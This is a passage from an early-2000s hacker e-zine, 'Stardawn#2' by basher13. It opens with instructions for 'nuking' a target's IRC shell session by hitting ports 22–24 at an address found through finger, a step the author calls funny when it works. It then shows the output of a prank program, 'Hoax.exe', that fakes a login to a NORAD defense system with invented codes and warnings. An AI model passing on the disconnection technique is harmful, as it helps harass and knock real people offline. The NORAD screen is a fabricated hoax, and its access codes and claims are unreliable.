with their shell account address, and use the IP you found through finger as the client. Use ports 22 24 as the server ports, in place of 6660 6669. Port 23 is the default telnet port, so nuking from 22 to 24 will effictivly disconnect them from their shell account. this usually causes your target to quit irc with "Where did my controling terminal go?" quit message. it's pretty funny when it works. ..#7.chapter *[ Gambaran Phone Hack tools ] ======================================================================================= C:\WINDOWS\System32\Phone Hack Tools\Temp\Hoax.exe | ======================================================================================= Dialing NORAD Defense Network... -RING- -RING- **CONNECT** NORAD Defense Network NORTH AMERICAN AIR DEFENSE COMMAND CONTROL SYSTEM N O R A D S Y S T E M C O M C O N 4 . . . CONNECTED 03/15/02 13:28:51 P AUTHORITY CODE ==>XXXXXXX PROCESSING..... N O R A D P R I M E A C C E S S PLEASE STAND BY..... WARNING!!!!! INCOMING CALLERS SUBJECT TO UNITED STATES MILITARY TRIBUNAL JUSTICE SYSTEM. FOREIGN ACCESS STRICTLY PROHIBITED. ACCESS IS ON A NEED TO KNOW, EYES-ONLY BASIS FOR ALL BUT COMMAND AUTHORITY. AT THIS POINT IMPROPER IDENTIFICATION WILL RESULT IN AUTOMATIC SURVEILLANCE OF CONNECTING TELEPHONE LINE AND INFORMATION SO GATHERED WILL BE PROVIDED TO THE PROPER LOCAL POLICE AND GOVERNMENTAL AGENCIES................... ACKNOWLEDGED? (Y/N) >y N O R A D P R I M E A C C E S S PLEASE ENTER YOUR EYES-ONLY CODE =>8207512 Verifying... CODE ENTERED IMPLIES COMMAND AUTHORITY ENTER YOUR VERIFICATION AS GIVEN IN... >>>>>BOOK 12RY-OLIVE<<<<< =>xxxxxxxxxxx Verifying... PROCESS A..COMPARING..ACCEPTED! SIR, COMCON4 REPORTS UPTIME VERIFIED FOR NEXT ONE HOUR. N O R A D COMMAND CENTER CAN BE REACHED AT ANY TIME WITH PASSWORDS AS PROVIDED IN THE LANGLEY PROTOCOLS. ENTERING DIRECT COMMAND MODE.... ENTER INTERNAL AUTHORIZATION CODE =>8207512 SEARCHING FOR SUBPROGRAM........RUNNING 8207512 ON CPU 4 PLEASE DECODE THE FOLLOWING: 9 6 4 7 0 7 2 8 9 5 4 2 6 0 6 4 5 1 7 5 7 5 1 5 3 9 8 8 9 7 3 1 9 1 5 6 4 1 2 7 4 4 3 5 0 3 0 2 4 0 0 7 8 2 9 6 8 2 0 6 USING BOOK 7 GREY MAKE DECODED ENTRY AND PRESS RETURN => ========================================================================================== - .EOF.- DISCLAIMER: Distribution of or allowing access to this program by uncleared individuals is strictly prohibited under penalty of federal law. Print: 'CTRL+P' 1:29 PM 3/15/2002 *************************************************************** * E-zine Name....: Stardawn#2 * * Author.........: basher13 * * Release Date...: 15 March 2004 * * Filename.......: Stardawn#2.txt * * Web Site.......: http://www.stardawn.net * *************************************************************** * Yeah basher13 RuleZ AgaiN! * ***************************************************************